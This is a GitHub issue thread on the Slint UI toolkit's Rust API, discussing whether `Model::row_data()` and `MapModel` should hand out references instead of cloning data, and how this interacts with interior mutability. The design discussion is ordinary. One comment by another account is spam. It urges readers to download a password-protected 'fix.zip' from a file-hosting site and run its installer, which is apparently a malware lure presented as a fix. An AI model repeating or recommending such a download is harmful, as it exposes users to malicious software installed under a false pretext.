### ISSUE TITLE
Unnecessary cloning in `Model` and `MapModel` (Rust)

### ISSUE THREAD

**Issue by Enyium** [slint-ui/slint#5955]
`Model::row_data()` is defined in Slint v1.7.2 as follows:

```rust
    fn row_data(&self, row: usize) -> Option<Self::Data>;
```

This forces implementations to clone the data, [as `VecModel` does](https://docs.rs/i-slint-core/1.7.2/src/i_slint_core/model.rs.html#400).

There's actually a strong parallel to slices' [`get()`](https://doc.rust-lang.org/std/primitive.slice.html#method.get), which returns a reference:

```rust
pub fn get<I>(&self, index: I) -> Option<&<I as SliceIndex<[T]>>::Output>
where
    I: SliceIndex<[T]>,
```

The lifetime should automatically be bound to `&self`. So, `Model::row_data()` should be changed to return `Option<&Self::Data>`.

Then, `MapModel`, which [calls](https://docs.rs/i-slint-core/1.7.2/src/i_slint_core/model/adapters.rs.html#201) the cloning `row_data()`, could also be changed, so that the map closure doesn't receive a clone anymore, but a reference to the data, as you often have in various map closures in Rust. The closures of `FilerModel` and `SortModel` also receive references to data items. Also, you have `SharedString` to avoid cloning `String`s, but `String`s may constantly be cloned in the context of `MapModel` closure calls.

---

However, could this come in conflict with the interior mutability of types like `VecModel`? May there be a design flaw? What really forces you to use interior mutability in this case? This is also relevant to my thoughts outlined in #5927, which propose a method analog to slices' `get_mut()`.

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Enyium** [comment]
Hmm, in `std`, you have `RefCell`, which is simply documented as to be used in the correct manner, having to avoid the wrong overlaps of `Ref` and `RefMut` instances from a single `RefCell`. Otherwise, you get panics. Why insist on this kind of atomic operations by cloning the data? As far as I can see, users could be provided short-lived helper types like `Ref`/`RefMut`, during which the Slint API must not be used in an overboarding way. To encourage not doing much else and drop the helper type early, you may be able to use the approach, "Let me run your closure for you that gives you brief access."

I must say, it's strange to have a `MapModel` map closure that you just can't stop from cloning `String`s, even though you'd simply need short access to the data.

Perhaps, it would, e.g., become a problem, if struct instances in a model contained another model, and accessing the inner model during a `MapModel` map closure could cause a panic. But could this simply be handled with good documentation and advice to clone yourself and drop the helper type early, if need be? Of course, panic messages would also need to give you proper hints.

**Comment by ogoffart** [comment]
That's why you should use SharedString instead of String so that cloning doesn't allocate.
We can't expose Ref because we don't know what is the exact underlying method used for interior mutability. Could be a Mutex or something else.

**Comment by Enyium** [comment]
I wasn't talking about exposing `Ref`/`RefMut`, but providing *similar* small helper types (like I talked about a `MutTracker` in the other issue). An implementor of `Model` wouldn't be forced to use `RefCell` to provide this method:

```rust
// Lifetimes could be left out in practice, as far as I can see.
fn row_data<'a>(&'a self, row: usize) -> Option<ReadonlyHelperType<'a, Self::Data>>;
```

`ReadonlyHelperType` (not the final name) could even be a generic type parameter on `Model` that a `Model` implementor would make concrete by specifiying either their own implementation of an associated helper type trait, or by using the Slint API's helper type trait implementation that's suited for usage with `RefCell`.

---

`SharedString` is not as sophisticated a type as `String` and shouldn't grow rampant into the backend. If you have a `String` in the backend from wherever and want to map it to a `StandardListViewItem`, which includes a `SharedString`, by surrounding the text with more text, you have to allocate a `SharedString`; but `MapModel` first gives you a clone of the original `String`, which is not in the spirit of `std`. The next owned instance created should be derived from a reference to the data.
